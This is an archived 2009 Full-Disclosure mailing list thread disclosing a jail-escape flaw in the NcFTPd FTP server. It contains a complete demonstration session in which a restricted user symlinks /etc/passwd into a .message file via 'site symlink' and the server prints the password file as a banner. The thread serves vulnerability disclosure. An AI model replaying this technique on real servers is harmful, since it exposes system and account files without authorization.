lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 27 Jul 2009 15:55:22 -0400
From: Jeremy Brown <0xjbrown41@...il.com>
To: Kingcope <kcope2@...glemail.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: NcFTPd <= 2.8.5 remote jail breakout

You seem to be very forgetful lately kcope! But it is ok, because your
research is always interesting. We forgive you :)

On Mon, Jul 27, 2009 at 3:50 PM, Kingcope<kcope2@...glemail.com> wrote:
> Hello list.
> Just to clarify the NcFTPd vulnerability affects all operating systems
> that NcFTPd runs on,
> not just FreeBSD.
>
> Cheers,
>
> kcope
>
>
>
> 2009/7/27 Kingcope <kcope2@...glemail.com>:
>> NcFTPd <= 2.8.5 remote jail breakout
>>
>> Discovered by:
>>        Kingcope
>>        Contact: kcope2<at>googlemail.com / http://isowarez.de
>>
>> Date:
>>        27th July 2009
>>
>> Greetings:
>>        Alex,Andi,Adize,wY!,Netspy,Revoguard
>>
>> Prerequisites:
>>        Valid user account.
>>
>> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>>
>> # ftp 192.168.2.5
>> Connected to 192.168.2.5.
>> 220 localhost NcFTPd Server (unregistered copy) ready.
>> Name (192.168.2.5:root): kcope
>> 331 User kcope okay, need password.
>> Password:
>> 230-You are user #1 of 50 simultaneous users allowed.
>> 230-
>> 230 Restricted user logged in.
>> Remote system type is UNIX.
>> Using binary mode to transfer files.
>> ftp> get /etc/passwd passwd
>> local: passwd remote: /etc/passwd
>> 502 Unimplemented command.
>> 227 Entering Passive Mode (192,168,2,5,219,171)
>> 550 No such file.
>> ftp> ls ..
>> 227 Entering Passive Mode (192,168,2,5,218,102)
>> 553 Permission denied.
>> ftp> mkdir isowarez
>> 257 "/isowarez" directory created.
>> ftp> quote site symlink /etc/passwd isowarez/.message
>> 250 Symlinked.
>> ftp> cd isowarez
>> 250-"/isowarez" is new cwd.
>> 250-
>> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
>> 250-#
>> 250-root:*:0:0:Charlie &:/root:/bin/sh
>> 250-toor:*:0:0:Bourne-again Superuser:/root:
>> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
>> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
>> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
>> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
>> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
>> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
>> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
>> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
>> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
>> 250-smmsp:*:25:25:Sendmail Submission
>> User:/var/spool/clientmqueue:/usr/sbin/nologin
>> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
>> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
>> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
>> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
>> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
>> 250-uucp:*:66:66:UUCP
>> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
>> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
>> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
>> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
>> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
>> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
>> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
>> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
>> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
>> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
>> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
>> 250-test:*:1003:1003:test:/home/test:/bin/sh
>> 250-+testx:*:::::/bin/sh
>> 250
>> ftp>
>>
>> +on freebsd you can symlink directories like ´/´
>>
>> Cheerio,
>>
>> Kingcope
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists